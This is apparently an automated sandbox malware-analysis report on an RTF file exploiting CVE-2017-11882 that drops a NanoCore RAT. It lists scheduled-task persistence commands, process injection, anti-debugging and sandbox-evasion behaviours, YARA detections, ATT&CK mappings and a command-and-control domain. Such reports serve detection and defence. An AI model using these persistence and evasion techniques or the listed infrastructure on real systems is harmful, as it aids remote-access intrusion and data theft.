Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\JNM.exe	Window / User API: threadDelayed 7741
Source: C:\Users\user\AppData\Roaming\JNM.exe	Window / User API: threadDelayed 1930
Source: C:\Users\user\AppData\Roaming\JNM.exe	Window / User API: foregroundWindowGot 372
Source: C:\Users\user\AppData\Roaming\JNM.exe	Window / User API: foregroundWindowGot 357
Source: C:\Users\user\AppData\Roaming\JNM.exe	Window / User API: foregroundWindowGot 576

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 920	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\JNM.exe TID: 2928	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\JNM.exe TID: 2856	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 2376	Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 3024	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\JNM.exe TID: 3068	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2424	Thread sleep time: -120000s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2512	Thread sleep time: -922337203685477s >= -30000s

Source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\user\AppData\Roaming\JNM.exe

Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Users\user\AppData\Roaming\JNM.exe

Code function: 3_2_00400AC4 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,00408D77,00000000,00000000

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\AppData\Roaming\JNM.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Roaming\JNM.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\JNM.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory written: C:\Users\user\AppData\Roaming\JNM.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory written: C:\Users\user\AppData\Roaming\JNM.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5A

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe 0
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1

Source: JNM.exe, 00000003.00000002.2356855208.0000000000ED0000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2356969483.0000000000ED0000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356001884.00000000007E0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2356959800.0000000000ED0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: JNM.exe, 00000003.00000002.2356855208.0000000000ED0000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2356969483.0000000000ED0000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356001884.00000000007E0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2356959800.0000000000ED0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: JNM.exe, 00000003.00000002.2356855208.0000000000ED0000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2356969483.0000000000ED0000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356001884.00000000007E0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2356959800.0000000000ED0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Users\user\AppData\Roaming\JNM.exe	Queries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\JNM.exe	Queries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\JNM.exe	Queries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformation
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\JNM.exe	Queries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformation
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation

Source: C:\Users\user\AppData\Roaming\JNM.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
Source: Yara match	File source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: JNM.exe, 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: JNM.exe, 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: JNM.exe, 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: JNM.exe, 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
Source: Yara match	File source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Scheduled Task/Job1	Process Injection112	Disable or Modify Tools1	Input Capture11	File and Directory Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Deobfuscate/Decode Files or Information1	LSASS Memory	System Information Discovery13	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Security Software Discovery311	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing11	NTDS	Virtualization/Sandbox Evasion13	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading2	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion13	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol112	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Statement.doc	45%	Virustotal		Browse
Statement.doc	59%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\JNM.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	35%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\JNM.exe	35%	ReversingLabs	ByteCode-MSIL.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Download
26.2.smtpsvc.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1108376	Download File
7.2.JNM.exe.630000.3.unpack	100%	Avira	TR/NanoCore.fadte	Download File
7.2.JNM.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108376	Download File
23.2.JNM.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108376	Download File

Domains

Source	Detection	Scanner	Label	Link
manojvashanava234.sytes.net	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
